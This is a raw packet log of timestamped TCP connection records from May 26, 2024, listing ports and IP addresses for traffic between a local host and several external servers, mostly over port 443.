May 26, 2024 10:31:02.150198936 CEST	49735	443	192.168.2.5	23.67.133.187
May 26, 2024 10:31:02.150198936 CEST	49735	443	192.168.2.5	23.67.133.187
May 26, 2024 10:31:02.150217056 CEST	443	49735	23.67.133.187	192.168.2.5
May 26, 2024 10:31:02.150274038 CEST	49735	443	192.168.2.5	23.67.133.187
May 26, 2024 10:31:02.150512934 CEST	49735	443	192.168.2.5	23.67.133.187
May 26, 2024 10:31:02.150532007 CEST	443	49735	23.67.133.187	192.168.2.5
May 26, 2024 10:31:02.211529016 CEST	49737	443	192.168.2.5	65.109.242.59
May 26, 2024 10:31:02.211560965 CEST	443	49737	65.109.242.59	192.168.2.5
May 26, 2024 10:31:02.211627007 CEST	49737	443	192.168.2.5	65.109.242.59
May 26, 2024 10:31:02.212003946 CEST	49737	443	192.168.2.5	65.109.242.59
May 26, 2024 10:31:02.212019920 CEST	443	49737	65.109.242.59	192.168.2.5
May 26, 2024 10:31:02.906236887 CEST	49738	443	192.168.2.5	188.114.96.3
May 26, 2024 10:31:02.906327009 CEST	443	49738	188.114.96.3	192.168.2.5
May 26, 2024 10:31:02.906430006 CEST	49738	443	192.168.2.5	188.114.96.3
May 26, 2024 10:31:02.906770945 CEST	49738	443	192.168.2.5	188.114.96.3
May 26, 2024 10:31:02.906810999 CEST	443	49738	188.114.96.3	192.168.2.5
May 26, 2024 10:31:03.242718935 CEST	443	49737	65.109.242.59	192.168.2.5
May 26, 2024 10:31:03.243176937 CEST	49737	443	192.168.2.5	65.109.242.59
May 26, 2024 10:31:03.246416092 CEST	49737	443	192.168.2.5	65.109.242.59
May 26, 2024 10:31:03.246428967 CEST	443	49737	65.109.242.59	192.168.2.5
May 26, 2024 10:31:03.246640921 CEST	443	49737	65.109.242.59	192.168.2.5
May 26, 2024 10:31:03.247948885 CEST	49737	443	192.168.2.5	65.109.242.59
May 26, 2024 10:31:03.248277903 CEST	49737	443	192.168.2.5	65.109.242.59
May 26, 2024 10:31:03.290513039 CEST	443	49737	65.109.242.59	192.168.2.5
May 26, 2024 10:31:03.403678894 CEST	443	49738	188.114.96.3	192.168.2.5
May 26, 2024 10:31:03.403811932 CEST	49738	443	192.168.2.5	188.114.96.3
May 26, 2024 10:31:03.404804945 CEST	49738	443	192.168.2.5	188.114.96.3
May 26, 2024 10:31:03.404848099 CEST	443	49738	188.114.96.3	192.168.2.5
May 26, 2024 10:31:03.405631065 CEST	443	49738	188.114.96.3	192.168.2.5
May 26, 2024 10:31:03.408844948 CEST	49738	443	192.168.2.5	188.114.96.3
May 26, 2024 10:31:03.409466028 CEST	49738	443	192.168.2.5	188.114.96.3
May 26, 2024 10:31:03.409636021 CEST	443	49738	188.114.96.3	192.168.2.5
May 26, 2024 10:31:03.409760952 CEST	49738	443	192.168.2.5	188.114.96.3
May 26, 2024 10:31:03.409813881 CEST	443	49738	188.114.96.3	192.168.2.5
May 26, 2024 10:31:03.410576105 CEST	49738	443	192.168.2.5	188.114.96.3
May 26, 2024 10:31:03.410636902 CEST	443	49738	188.114.96.3	192.168.2.5
May 26, 2024 10:31:03.412559032 CEST	49738	443	192.168.2.5	188.114.96.3
May 26, 2024 10:31:03.412606955 CEST	443	49738	188.114.96.3	192.168.2.5
May 26, 2024 10:31:03.414935112 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:31:03.415139914 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:31:03.415141106 CEST	49733	80	192.168.2.5	91.202.233.231
May 26, 2024 10:31:03.415141106 CEST	49738	443	192.168.2.5	188.114.96.3
May 26, 2024 10:31:03.415235996 CEST	443	49738	188.114.96.3	192.168.2.5
May 26, 2024 10:31:03.415482998 CEST	49738	443	192.168.2.5	188.114.96.3
May 26, 2024 10:31:03.415524006 CEST	443	49738	188.114.96.3	192.168.2.5
May 26, 2024 10:31:03.415545940 CEST	49738	443	192.168.2.5	188.114.96.3
May 26, 2024 10:31:03.415560961 CEST	443	49738	188.114.96.3	192.168.2.5
May 26, 2024 10:31:03.415584087 CEST	49738	443	192.168.2.5	188.114.96.3
May 26, 2024 10:31:03.415596962 CEST	443	49738	188.114.96.3	192.168.2.5
May 26, 2024 10:31:03.415726900 CEST	49738	443	192.168.2.5	188.114.96.3
May 26, 2024 10:31:03.415775061 CEST	443	49738	188.114.96.3	192.168.2.5
May 26, 2024 10:31:03.415819883 CEST	49738	443	192.168.2.5	188.114.96.3
May 26, 2024 10:31:03.415915966 CEST	49738	443	192.168.2.5	188.114.96.3
May 26, 2024 10:31:03.415971994 CEST	49738	443	192.168.2.5	188.114.96.3
May 26, 2024 10:31:03.429500103 CEST	80	49733	91.202.233.231	192.168.2.5
May 26, 2024 10:31:03.430016041 CEST	443	49738	188.114.96.3	192.168.2.5
May 26, 2024 10:31:03.430202961 CEST	49738	443	192.168.2.5	188.114.96.3
May 26, 2024 10:31:03.430259943 CEST	49738	443	192.168.2.5	188.114.96.3
May 26, 2024 10:31:03.430284977 CEST	443	49738	188.114.96.3	192.168.2.5
May 26, 2024 10:31:03.430321932 CEST	49738	443	192.168.2.5	188.114.96.3
May 26, 2024 10:31:03.430336952 CEST	443	49738	188.114.96.3	192.168.2.5
May 26, 2024 10:31:03.430362940 CEST	49738	443	192.168.2.5	188.114.96.3
May 26, 2024 10:31:03.430422068 CEST	443	49738	188.114.96.3	192.168.2.5
May 26, 2024 10:31:03.777667046 CEST	443	49737	65.109.242.59	192.168.2.5
May 26, 2024 10:31:03.777781963 CEST	49737	443	192.168.2.5	65.109.242.59
May 26, 2024 10:31:03.777797937 CEST	443	49737	65.109.242.59	192.168.2.5
May 26, 2024 10:31:03.777951002 CEST	49737	443	192.168.2.5	65.109.242.59
May 26, 2024 10:31:03.782345057 CEST	443	49737	65.109.242.59	192.168.2.5
May 26, 2024 10:31:03.782398939 CEST	443	49737	65.109.242.59	192.168.2.5
May 26, 2024 10:31:03.782442093 CEST	49737	443	192.168.2.5	65.109.242.59
May 26, 2024 10:31:03.782442093 CEST	49737	443	192.168.2.5	65.109.242.59
May 26, 2024 10:31:03.782638073 CEST	49737	443	192.168.2.5	65.109.242.59
May 26, 2024 10:31:03.782638073 CEST	49737	443	192.168.2.5	65.109.242.59
May 26, 2024 10:31:03.782658100 CEST	443	49737	65.109.242.59	192.168.2.5
May 26, 2024 10:31:03.782871962 CEST	49737	443	192.168.2.5	65.109.242.59
May 26, 2024 10:31:03.852513075 CEST	49739	443	192.168.2.5	65.109.242.59
May 26, 2024 10:31:03.852545977 CEST	443	49739	65.109.242.59	192.168.2.5
May 26, 2024 10:31:03.852675915 CEST	49739	443	192.168.2.5	65.109.242.59
May 26, 2024 10:31:03.853255987 CEST	49739	443	192.168.2.5	65.109.242.59
May 26, 2024 10:31:03.853271008 CEST	443	49739	65.109.242.59	192.168.2.5
May 26, 2024 10:31:04.548623085 CEST	443	49739	65.109.242.59	192.168.2.5
May 26, 2024 10:31:04.548717976 CEST	49739	443	192.168.2.5	65.109.242.59
May 26, 2024 10:31:04.549144030 CEST	49739	443	192.168.2.5	65.109.242.59
May 26, 2024 10:31:04.549154043 CEST	443	49739	65.109.242.59	192.168.2.5
May 26, 2024 10:31:04.550549984 CEST	49739	443	192.168.2.5	65.109.242.59
May 26, 2024 10:31:04.550555944 CEST	443	49739	65.109.242.59	192.168.2.5
May 26, 2024 10:31:05.345172882 CEST	443	49739	65.109.242.59	192.168.2.5
May 26, 2024 10:31:05.345232010 CEST	443	49739	65.109.242.59	192.168.2.5
May 26, 2024 10:31:05.345376968 CEST	49739	443	192.168.2.5	65.109.242.59
May 26, 2024 10:31:05.345690966 CEST	49739	443	192.168.2.5	65.109.242.59
May 26, 2024 10:31:05.345712900 CEST	443	49739	65.109.242.59	192.168.2.5
May 26, 2024 10:31:05.400763035 CEST	49740	443	192.168.2.5	65.109.242.59
May 26, 2024 10:31:05.400799990 CEST	443	49740	65.109.242.59	192.168.2.5
May 26, 2024 10:31:05.400871992 CEST	49740	443	192.168.2.5	65.109.242.59
May 26, 2024 10:31:05.401078939 CEST	49740	443	192.168.2.5	65.109.242.59
May 26, 2024 10:31:05.401094913 CEST	443	49740	65.109.242.59	192.168.2.5
May 26, 2024 10:31:05.715702057 CEST	443	49738	188.114.96.3	192.168.2.5
May 26, 2024 10:31:05.715802908 CEST	443	49738	188.114.96.3	192.168.2.5
May 26, 2024 10:31:05.716010094 CEST	49738	443	192.168.2.5	188.114.96.3
May 26, 2024 10:31:05.716104031 CEST	49738	443	192.168.2.5	188.114.96.3
May 26, 2024 10:31:05.716142893 CEST	443	49738	188.114.96.3	192.168.2.5
May 26, 2024 10:31:06.076225042 CEST	443	49740	65.109.242.59	192.168.2.5
May 26, 2024 10:31:06.076314926 CEST	49740	443	192.168.2.5	65.109.242.59
May 26, 2024 10:31:06.076637983 CEST	49740	443	192.168.2.5	65.109.242.59
May 26, 2024 10:31:06.076646090 CEST	443	49740	65.109.242.59	192.168.2.5
May 26, 2024 10:31:06.078083038 CEST	49740	443	192.168.2.5	65.109.242.59
May 26, 2024 10:31:06.078088045 CEST	443	49740	65.109.242.59	192.168.2.5
May 26, 2024 10:31:06.887931108 CEST	443	49740	65.109.242.59	192.168.2.5
May 26, 2024 10:31:06.887947083 CEST	443	49740	65.109.242.59	192.168.2.5
May 26, 2024 10:31:06.887993097 CEST	443	49740	65.109.242.59	192.168.2.5
May 26, 2024 10:31:06.887999058 CEST	49740	443	192.168.2.5	65.109.242.59
May 26, 2024 10:31:06.888030052 CEST	49740	443	192.168.2.5	65.109.242.59
May 26, 2024 10:31:06.889610052 CEST	49740	443	192.168.2.5	65.109.242.59
May 26, 2024 10:31:06.889627934 CEST	443	49740	65.109.242.59	192.168.2.5
May 26, 2024 10:31:06.959278107 CEST	49741	443	192.168.2.5	65.109.242.59
May 26, 2024 10:31:06.959315062 CEST	443	49741	65.109.242.59	192.168.2.5
May 26, 2024 10:31:06.959372044 CEST	49741	443	192.168.2.5	65.109.242.59
May 26, 2024 10:31:06.959549904 CEST	49741	443	192.168.2.5	65.109.242.59
May 26, 2024 10:31:06.959564924 CEST	443	49741	65.109.242.59	192.168.2.5
May 26, 2024 10:31:07.657320976 CEST	443	49741	65.109.242.59	192.168.2.5
May 26, 2024 10:31:07.657378912 CEST	49741	443	192.168.2.5	65.109.242.59
May 26, 2024 10:31:07.657783985 CEST	49741	443	192.168.2.5	65.109.242.59
May 26, 2024 10:31:07.657793045 CEST	443	49741	65.109.242.59	192.168.2.5
May 26, 2024 10:31:07.659115076 CEST	49741	443	192.168.2.5	65.109.242.59
May 26, 2024 10:31:07.659121037 CEST	443	49741	65.109.242.59	192.168.2.5
May 26, 2024 10:31:08.463752031 CEST	443	49741	65.109.242.59	192.168.2.5
May 26, 2024 10:31:08.463776112 CEST	443	49741	65.109.242.59	192.168.2.5
May 26, 2024 10:31:08.463836908 CEST	443	49741	65.109.242.59	192.168.2.5
May 26, 2024 10:31:08.463987112 CEST	49741	443	192.168.2.5	65.109.242.59
May 26, 2024 10:31:08.463988066 CEST	49741	443	192.168.2.5	65.109.242.59
May 26, 2024 10:31:08.464276075 CEST	49741	443	192.168.2.5	65.109.242.59
May 26, 2024 10:31:08.464304924 CEST	443	49741	65.109.242.59	192.168.2.5
May 26, 2024 10:31:08.541703939 CEST	49745	443	192.168.2.5	65.109.242.59
May 26, 2024 10:31:08.541784048 CEST	443	49745	65.109.242.59	192.168.2.5
May 26, 2024 10:31:08.541887999 CEST	49745	443	192.168.2.5	65.109.242.59
May 26, 2024 10:31:08.542088032 CEST	49745	443	192.168.2.5	65.109.242.59
May 26, 2024 10:31:08.542117119 CEST	443	49745	65.109.242.59	192.168.2.5
May 26, 2024 10:31:08.665776968 CEST	49717	80	192.168.2.5	45.129.96.86
May 26, 2024 10:31:08.671344995 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:31:08.671442032 CEST	49717	80	192.168.2.5	45.129.96.86
May 26, 2024 10:31:09.279247999 CEST	443	49745	65.109.242.59	192.168.2.5
May 26, 2024 10:31:09.279294968 CEST	49745	443	192.168.2.5	65.109.242.59
May 26, 2024 10:31:09.279901028 CEST	49745	443	192.168.2.5	65.109.242.59
May 26, 2024 10:31:09.279910088 CEST	443	49745	65.109.242.59	192.168.2.5
May 26, 2024 10:31:09.281347036 CEST	49745	443	192.168.2.5	65.109.242.59
May 26, 2024 10:31:09.281352043 CEST	443	49745	65.109.242.59	192.168.2.5
May 26, 2024 10:31:10.015760899 CEST	443	49745	65.109.242.59	192.168.2.5
May 26, 2024 10:31:10.015830040 CEST	443	49745	65.109.242.59	192.168.2.5
May 26, 2024 10:31:10.015846014 CEST	49745	443	192.168.2.5	65.109.242.59
May 26, 2024 10:31:10.015876055 CEST	49745	443	192.168.2.5	65.109.242.59
May 26, 2024 10:31:10.015965939 CEST	49745	443	192.168.2.5	65.109.242.59
May 26, 2024 10:31:10.015985012 CEST	443	49745	65.109.242.59	192.168.2.5
May 26, 2024 10:31:10.152543068 CEST	49746	443	192.168.2.5	65.109.242.59
May 26, 2024 10:31:10.152566910 CEST	443	49746	65.109.242.59	192.168.2.5
May 26, 2024 10:31:10.152633905 CEST	49746	443	192.168.2.5	65.109.242.59
May 26, 2024 10:31:10.152950048 CEST	49746	443	192.168.2.5	65.109.242.59
May 26, 2024 10:31:10.152960062 CEST	443	49746	65.109.242.59	192.168.2.5
May 26, 2024 10:31:10.832772017 CEST	443	49746	65.109.242.59	192.168.2.5
May 26, 2024 10:31:10.832832098 CEST	49746	443	192.168.2.5	65.109.242.59
May 26, 2024 10:31:10.833255053 CEST	49746	443	192.168.2.5	65.109.242.59
May 26, 2024 10:31:10.833264112 CEST	443	49746	65.109.242.59	192.168.2.5
May 26, 2024 10:31:10.834923029 CEST	49746	443	192.168.2.5	65.109.242.59
May 26, 2024 10:31:10.834928036 CEST	443	49746	65.109.242.59	192.168.2.5
May 26, 2024 10:31:10.835027933 CEST	49746	443	192.168.2.5	65.109.242.59
May 26, 2024 10:31:10.835041046 CEST	443	49746	65.109.242.59	192.168.2.5
May 26, 2024 10:31:11.386379004 CEST	49748	443	192.168.2.5	65.109.242.59
May 26, 2024 10:31:11.386471987 CEST	443	49748	65.109.242.59	192.168.2.5
May 26, 2024 10:31:11.386605024 CEST	49748	443	192.168.2.5	65.109.242.59
May 26, 2024 10:31:11.386873960 CEST	49748	443	192.168.2.5	65.109.242.59
May 26, 2024 10:31:11.386909008 CEST	443	49748	65.109.242.59	192.168.2.5
May 26, 2024 10:31:11.531980038 CEST	443	49746	65.109.242.59	192.168.2.5
May 26, 2024 10:31:11.532058001 CEST	443	49746	65.109.242.59	192.168.2.5
May 26, 2024 10:31:11.532105923 CEST	49746	443	192.168.2.5	65.109.242.59
May 26, 2024 10:31:11.532141924 CEST	49746	443	192.168.2.5	65.109.242.59
May 26, 2024 10:31:11.532943010 CEST	49746	443	192.168.2.5	65.109.242.59
May 26, 2024 10:31:11.532980919 CEST	443	49746	65.109.242.59	192.168.2.5
May 26, 2024 10:31:12.079693079 CEST	443	49748	65.109.242.59	192.168.2.5
May 26, 2024 10:31:12.080986977 CEST	49748	443	192.168.2.5	65.109.242.59
May 26, 2024 10:31:12.081321955 CEST	49748	443	192.168.2.5	65.109.242.59
May 26, 2024 10:31:12.081341982 CEST	443	49748	65.109.242.59	192.168.2.5
May 26, 2024 10:31:12.118916988 CEST	49748	443	192.168.2.5	65.109.242.59
May 26, 2024 10:31:12.118954897 CEST	443	49748	65.109.242.59	192.168.2.5
May 26, 2024 10:31:12.609040022 CEST	443	49748	65.109.242.59	192.168.2.5
May 26, 2024 10:31:12.609069109 CEST	443	49748	65.109.242.59	192.168.2.5
May 26, 2024 10:31:12.609088898 CEST	443	49748	65.109.242.59	192.168.2.5
May 26, 2024 10:31:12.609309912 CEST	49748	443	192.168.2.5	65.109.242.59
May 26, 2024 10:31:12.609309912 CEST	49748	443	192.168.2.5	65.109.242.59
May 26, 2024 10:31:12.609388113 CEST	443	49748	65.109.242.59	192.168.2.5
May 26, 2024 10:31:12.609477043 CEST	49748	443	192.168.2.5	65.109.242.59
May 26, 2024 10:31:12.634186983 CEST	443	49748	65.109.242.59	192.168.2.5
May 26, 2024 10:31:12.634221077 CEST	443	49748	65.109.242.59	192.168.2.5
May 26, 2024 10:31:12.634382010 CEST	49748	443	192.168.2.5	65.109.242.59
May 26, 2024 10:31:12.634382010 CEST	49748	443	192.168.2.5	65.109.242.59
May 26, 2024 10:31:12.634443998 CEST	443	49748	65.109.242.59	192.168.2.5
May 26, 2024 10:31:12.635812044 CEST	49748	443	192.168.2.5	65.109.242.59
May 26, 2024 10:31:12.706718922 CEST	443	49748	65.109.242.59	192.168.2.5
May 26, 2024 10:31:12.706777096 CEST	443	49748	65.109.242.59	192.168.2.5
May 26, 2024 10:31:12.706979990 CEST	49748	443	192.168.2.5	65.109.242.59
May 26, 2024 10:31:12.707040071 CEST	443	49748	65.109.242.59	192.168.2.5
May 26, 2024 10:31:12.707118034 CEST	49748	443	192.168.2.5	65.109.242.59
May 26, 2024 10:31:12.746252060 CEST	443	49748	65.109.242.59	192.168.2.5
May 26, 2024 10:31:12.746277094 CEST	443	49748	65.109.242.59	192.168.2.5
May 26, 2024 10:31:12.746362925 CEST	49748	443	192.168.2.5	65.109.242.59
May 26, 2024 10:31:12.746380091 CEST	443	49748	65.109.242.59	192.168.2.5
May 26, 2024 10:31:12.746416092 CEST	49748	443	192.168.2.5	65.109.242.59
May 26, 2024 10:31:12.746436119 CEST	49748	443	192.168.2.5	65.109.242.59
May 26, 2024 10:31:12.784271955 CEST	443	49748	65.109.242.59	192.168.2.5
May 26, 2024 10:31:12.784297943 CEST	443	49748	65.109.242.59	192.168.2.5
May 26, 2024 10:31:12.784375906 CEST	49748	443	192.168.2.5	65.109.242.59
May 26, 2024 10:31:12.784440994 CEST	443	49748	65.109.242.59	192.168.2.5
May 26, 2024 10:31:12.784477949 CEST	49748	443	192.168.2.5	65.109.242.59
May 26, 2024 10:31:12.785846949 CEST	49748	443	192.168.2.5	65.109.242.59
May 26, 2024 10:31:12.812459946 CEST	443	49748	65.109.242.59	192.168.2.5
May 26, 2024 10:31:12.812482119 CEST	443	49748	65.109.242.59	192.168.2.5
May 26, 2024 10:31:12.812544107 CEST	49748	443	192.168.2.5	65.109.242.59
May 26, 2024 10:31:12.812566042 CEST	443	49748	65.109.242.59	192.168.2.5
May 26, 2024 10:31:12.812589884 CEST	49748	443	192.168.2.5	65.109.242.59
May 26, 2024 10:31:12.812625885 CEST	49748	443	192.168.2.5	65.109.242.59
May 26, 2024 10:31:12.834609032 CEST	443	49748	65.109.242.59	192.168.2.5
May 26, 2024 10:31:12.834631920 CEST	443	49748	65.109.242.59	192.168.2.5
May 26, 2024 10:31:12.834714890 CEST	49748	443	192.168.2.5	65.109.242.59
May 26, 2024 10:31:12.834728003 CEST	443	49748	65.109.242.59	192.168.2.5
May 26, 2024 10:31:12.834753990 CEST	49748	443	192.168.2.5	65.109.242.59
May 26, 2024 10:31:12.834788084 CEST	49748	443	192.168.2.5	65.109.242.59
May 26, 2024 10:31:12.852674007 CEST	443	49748	65.109.242.59	192.168.2.5
May 26, 2024 10:31:12.852694035 CEST	443	49748	65.109.242.59	192.168.2.5
May 26, 2024 10:31:12.852757931 CEST	49748	443	192.168.2.5	65.109.242.59
May 26, 2024 10:31:12.852771997 CEST	443	49748	65.109.242.59	192.168.2.5
May 26, 2024 10:31:12.852830887 CEST	49748	443	192.168.2.5	65.109.242.59
May 26, 2024 10:31:12.873054981 CEST	443	49748	65.109.242.59	192.168.2.5
May 26, 2024 10:31:12.873085022 CEST	443	49748	65.109.242.59	192.168.2.5
May 26, 2024 10:31:12.873147964 CEST	49748	443	192.168.2.5	65.109.242.59
May 26, 2024 10:31:12.873159885 CEST	443	49748	65.109.242.59	192.168.2.5
May 26, 2024 10:31:12.873187065 CEST	49748	443	192.168.2.5	65.109.242.59
May 26, 2024 10:31:12.873204947 CEST	49748	443	192.168.2.5	65.109.242.59
May 26, 2024 10:31:12.892187119 CEST	443	49748	65.109.242.59	192.168.2.5
May 26, 2024 10:31:12.892215967 CEST	443	49748	65.109.242.59	192.168.2.5
May 26, 2024 10:31:12.892288923 CEST	49748	443	192.168.2.5	65.109.242.59
May 26, 2024 10:31:12.892307043 CEST	443	49748	65.109.242.59	192.168.2.5
May 26, 2024 10:31:12.892366886 CEST	49748	443	192.168.2.5	65.109.242.59
May 26, 2024 10:31:12.910535097 CEST	443	49748	65.109.242.59	192.168.2.5
May 26, 2024 10:31:12.910564899 CEST	443	49748	65.109.242.59	192.168.2.5
May 26, 2024 10:31:12.910649061 CEST	49748	443	192.168.2.5	65.109.242.59
May 26, 2024 10:31:12.910705090 CEST	443	49748	65.109.242.59	192.168.2.5
May 26, 2024 10:31:12.910733938 CEST	49748	443	192.168.2.5	65.109.242.59
May 26, 2024 10:31:12.910954952 CEST	49748	443	192.168.2.5	65.109.242.59
May 26, 2024 10:31:12.927756071 CEST	443	49748	65.109.242.59	192.168.2.5
May 26, 2024 10:31:12.927786112 CEST	443	49748	65.109.242.59	192.168.2.5
May 26, 2024 10:31:12.927944899 CEST	49748	443	192.168.2.5	65.109.242.59
May 26, 2024 10:31:12.927961111 CEST	443	49748	65.109.242.59	192.168.2.5
May 26, 2024 10:31:12.928034067 CEST	49748	443	192.168.2.5	65.109.242.59
May 26, 2024 10:31:12.938661098 CEST	443	49748	65.109.242.59	192.168.2.5
May 26, 2024 10:31:12.938685894 CEST	443	49748	65.109.242.59	192.168.2.5
May 26, 2024 10:31:12.938759089 CEST	49748	443	192.168.2.5	65.109.242.59
May 26, 2024 10:31:12.938771963 CEST	443	49748	65.109.242.59	192.168.2.5
May 26, 2024 10:31:12.938841105 CEST	49748	443	192.168.2.5	65.109.242.59
May 26, 2024 10:31:12.950304031 CEST	443	49748	65.109.242.59	192.168.2.5
May 26, 2024 10:31:12.950325966 CEST	443	49748	65.109.242.59	192.168.2.5
May 26, 2024 10:31:12.950382948 CEST	49748	443	192.168.2.5	65.109.242.59
May 26, 2024 10:31:12.950397015 CEST	443	49748	65.109.242.59	192.168.2.5
May 26, 2024 10:31:12.950452089 CEST	49748	443	192.168.2.5	65.109.242.59
May 26, 2024 10:31:12.959614038 CEST	443	49748	65.109.242.59	192.168.2.5
May 26, 2024 10:31:12.959634066 CEST	443	49748	65.109.242.59	192.168.2.5
May 26, 2024 10:31:12.959701061 CEST	49748	443	192.168.2.5	65.109.242.59
May 26, 2024 10:31:12.959712029 CEST	443	49748	65.109.242.59	192.168.2.5
May 26, 2024 10:31:12.959780931 CEST	49748	443	192.168.2.5	65.109.242.59
May 26, 2024 10:31:12.968934059 CEST	443	49748	65.109.242.59	192.168.2.5
May 26, 2024 10:31:12.968954086 CEST	443	49748	65.109.242.59	192.168.2.5
May 26, 2024 10:31:12.969027042 CEST	49748	443	192.168.2.5	65.109.242.59
May 26, 2024 10:31:12.969039917 CEST	443	49748	65.109.242.59	192.168.2.5
May 26, 2024 10:31:12.969091892 CEST	49748	443	192.168.2.5	65.109.242.59
May 26, 2024 10:31:12.979032993 CEST	443	49748	65.109.242.59	192.168.2.5
May 26, 2024 10:31:12.979054928 CEST	443	49748	65.109.242.59	192.168.2.5
May 26, 2024 10:31:12.979127884 CEST	49748	443	192.168.2.5	65.109.242.59
May 26, 2024 10:31:12.979140043 CEST	443	49748	65.109.242.59	192.168.2.5
May 26, 2024 10:31:12.979212046 CEST	49748	443	192.168.2.5	65.109.242.59
May 26, 2024 10:31:12.987340927 CEST	443	49748	65.109.242.59	192.168.2.5
May 26, 2024 10:31:12.987360001 CEST	443	49748	65.109.242.59	192.168.2.5
May 26, 2024 10:31:12.987437963 CEST	49748	443	192.168.2.5	65.109.242.59
May 26, 2024 10:31:12.987453938 CEST	443	49748	65.109.242.59	192.168.2.5
May 26, 2024 10:31:12.987507105 CEST	49748	443	192.168.2.5	65.109.242.59
May 26, 2024 10:31:12.999114037 CEST	443	49748	65.109.242.59	192.168.2.5
May 26, 2024 10:31:12.999161959 CEST	443	49748	65.109.242.59	192.168.2.5
May 26, 2024 10:31:12.999201059 CEST	49748	443	192.168.2.5	65.109.242.59
May 26, 2024 10:31:12.999212980 CEST	443	49748	65.109.242.59	192.168.2.5
May 26, 2024 10:31:12.999248981 CEST	49748	443	192.168.2.5	65.109.242.59
May 26, 2024 10:31:12.999269962 CEST	49748	443	192.168.2.5	65.109.242.59
May 26, 2024 10:31:13.014539957 CEST	443	49748	65.109.242.59	192.168.2.5
May 26, 2024 10:31:13.014559031 CEST	443	49748	65.109.242.59	192.168.2.5
May 26, 2024 10:31:13.014636040 CEST	49748	443	192.168.2.5	65.109.242.59
May 26, 2024 10:31:13.014647961 CEST	443	49748	65.109.242.59	192.168.2.5
May 26, 2024 10:31:13.014796019 CEST	49748	443	192.168.2.5	65.109.242.59
May 26, 2024 10:31:13.034897089 CEST	443	49748	65.109.242.59	192.168.2.5
May 26, 2024 10:31:13.034944057 CEST	443	49748	65.109.242.59	192.168.2.5
May 26, 2024 10:31:13.034979105 CEST	49748	443	192.168.2.5	65.109.242.59
May 26, 2024 10:31:13.034991026 CEST	443	49748	65.109.242.59	192.168.2.5
May 26, 2024 10:31:13.035048962 CEST	49748	443	192.168.2.5	65.109.242.59
May 26, 2024 10:31:13.035072088 CEST	49748	443	192.168.2.5	65.109.242.59
May 26, 2024 10:31:13.043179035 CEST	443	49748	65.109.242.59	192.168.2.5
May 26, 2024 10:31:13.043200016 CEST	443	49748	65.109.242.59	192.168.2.5
May 26, 2024 10:31:13.043282986 CEST	49748	443	192.168.2.5	65.109.242.59
May 26, 2024 10:31:13.043294907 CEST	443	49748	65.109.242.59	192.168.2.5
May 26, 2024 10:31:13.043392897 CEST	49748	443	192.168.2.5	65.109.242.59
May 26, 2024 10:31:13.056195974 CEST	443	49748	65.109.242.59	192.168.2.5
May 26, 2024 10:31:13.056216955 CEST	443	49748	65.109.242.59	192.168.2.5
May 26, 2024 10:31:13.056283951 CEST	49748	443	192.168.2.5	65.109.242.59
May 26, 2024 10:31:13.056296110 CEST	443	49748	65.109.242.59	192.168.2.5
May 26, 2024 10:31:13.056407928 CEST	49748	443	192.168.2.5	65.109.242.59
May 26, 2024 10:31:13.061697960 CEST	443	49748	65.109.242.59	192.168.2.5
May 26, 2024 10:31:13.061717987 CEST	443	49748	65.109.242.59	192.168.2.5
May 26, 2024 10:31:13.061809063 CEST	49748	443	192.168.2.5	65.109.242.59
May 26, 2024 10:31:13.061821938 CEST	443	49748	65.109.242.59	192.168.2.5
May 26, 2024 10:31:13.061877012 CEST	49748	443	192.168.2.5	65.109.242.59
May 26, 2024 10:31:13.068276882 CEST	443	49748	65.109.242.59	192.168.2.5
May 26, 2024 10:31:13.068322897 CEST	443	49748	65.109.242.59	192.168.2.5
May 26, 2024 10:31:13.068401098 CEST	49748	443	192.168.2.5	65.109.242.59
May 26, 2024 10:31:13.068414927 CEST	443	49748	65.109.242.59	192.168.2.5
May 26, 2024 10:31:13.068487883 CEST	49748	443	192.168.2.5	65.109.242.59
May 26, 2024 10:31:13.075742006 CEST	443	49748	65.109.242.59	192.168.2.5
May 26, 2024 10:31:13.075773001 CEST	443	49748	65.109.242.59	192.168.2.5
May 26, 2024 10:31:13.075851917 CEST	49748	443	192.168.2.5	65.109.242.59
May 26, 2024 10:31:13.075865030 CEST	443	49748	65.109.242.59	192.168.2.5
May 26, 2024 10:31:13.075913906 CEST	49748	443	192.168.2.5	65.109.242.59
May 26, 2024 10:31:13.087712049 CEST	443	49748	65.109.242.59	192.168.2.5
May 26, 2024 10:31:13.087759018 CEST	443	49748	65.109.242.59	192.168.2.5
May 26, 2024 10:31:13.087918997 CEST	49748	443	192.168.2.5	65.109.242.59
May 26, 2024 10:31:13.087930918 CEST	443	49748	65.109.242.59	192.168.2.5
May 26, 2024 10:31:13.088002920 CEST	49748	443	192.168.2.5	65.109.242.59
May 26, 2024 10:31:13.104675055 CEST	443	49748	65.109.242.59	192.168.2.5
May 26, 2024 10:31:13.104701042 CEST	443	49748	65.109.242.59	192.168.2.5
May 26, 2024 10:31:13.104770899 CEST	49748	443	192.168.2.5	65.109.242.59
May 26, 2024 10:31:13.104784012 CEST	443	49748	65.109.242.59	192.168.2.5
May 26, 2024 10:31:13.104834080 CEST	49748	443	192.168.2.5	65.109.242.59
May 26, 2024 10:31:13.104855061 CEST	49748	443	192.168.2.5	65.109.242.59
May 26, 2024 10:31:13.121726036 CEST	443	49748	65.109.242.59	192.168.2.5
May 26, 2024 10:31:13.121778011 CEST	443	49748	65.109.242.59	192.168.2.5
May 26, 2024 10:31:13.121871948 CEST	49748	443	192.168.2.5	65.109.242.59
May 26, 2024 10:31:13.121885061 CEST	443	49748	65.109.242.59	192.168.2.5
May 26, 2024 10:31:13.121956110 CEST	49748	443	192.168.2.5	65.109.242.59
May 26, 2024 10:31:13.129158974 CEST	443	49748	65.109.242.59	192.168.2.5
May 26, 2024 10:31:13.129177094 CEST	443	49748	65.109.242.59	192.168.2.5
May 26, 2024 10:31:13.129251003 CEST	49748	443	192.168.2.5	65.109.242.59
May 26, 2024 10:31:13.129264116 CEST	443	49748	65.109.242.59	192.168.2.5
May 26, 2024 10:31:13.129317045 CEST	49748	443	192.168.2.5	65.109.242.59
May 26, 2024 10:31:13.145987034 CEST	443	49748	65.109.242.59	192.168.2.5
May 26, 2024 10:31:13.146008968 CEST	443	49748	65.109.242.59	192.168.2.5
May 26, 2024 10:31:13.146190882 CEST	49748	443	192.168.2.5	65.109.242.59
May 26, 2024 10:31:13.146219015 CEST	443	49748	65.109.242.59	192.168.2.5
